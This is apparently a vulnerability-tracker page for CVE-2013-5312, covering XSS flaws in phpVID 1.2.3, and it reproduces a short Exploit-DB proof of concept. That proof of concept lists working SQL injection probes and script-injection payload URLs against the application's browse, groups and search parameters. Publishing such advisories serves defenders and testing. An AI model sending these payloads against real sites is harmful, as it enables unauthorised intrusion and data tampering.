CVE-2013-5312

medium

Published 2013-08-19 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

5.3

Description

Multiple cross-site scripting (XSS) vulnerabilities in Vastal I-Tech phpVID 1.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) n parameter to browse_videos.php or the (2) cat parameter to groups.php.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-27519 webapps php verified text · 2 KB

3spi0n · 2013-08-12

PHPVID 1.2.3 - Multiple Vulnerabilities

text exploit Source: Exploit-DB

##################################################################################
  _____                 _       _   _                _____           
 |  __ \               | |     | | (_)              / ____|          
 | |__) |_____   _____ | |_   _| |_ _  ___  _ __   | (___   ___  ___ 
 |  _  // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \   \___ \ / _ \/ __|
 | | \ \  __/\ V / (_) | | |_| | |_| | (_) | | | |  ____) |  __/ (__ 
 |_|  \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| |_____/ \___|\___|
                                                                                                                                        
##################################################################################																
PhpVID Script, Multiple Vulnerabilities
Product Page: http://www.vastal.com/phpvid-the-video-sharing-software.html

Author(Pentester): 3spi0n
On Web: RevolutionSec.Com - GraySecure.Org
On Social: Twitter.Com/eyyamgudeer
##################################################################################

[1] SQL Injection Vulnerabilities on Demo Site

[+] (browse_videos.php, n Param)
>>> http://server//browse_videos.php?cat=&n='1

[+] (groups.php, cat Param)
>>> http://server/groups.php?cat='1

[+] (members.php, n Param)
>>> http://server/members.php?browse=recent&n='1

[2] XSS Vulnerability on Demo Site

[+] (browse_videos.php, n Param)
>>> http://server/browse_videos.php?cat=&n=1'<ScRiPt >prompt(959580)</ScRiPt>

[+] (groups.php, cat Param)
>>> http://server//groups.php?cat=1'<ScRiPt >prompt(987925)</ScRiPt>

[+] (search_results.php.php, query Param)
>>> http://server//search_results.php?query=<ScRiPt >prompt(931776)</ScRiPt>

[3] CRLF Injection Vulnerability on Demo Site
>>> http://server/search_results.php?query=<marquee><h1>come to dance! <br>by, 3spi0n</h1></marquee>

Application impact

Vendor	Product	Versions	Fixed
vastal	phpvid	`1.2.3`

References

CWEs

CWE-79

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.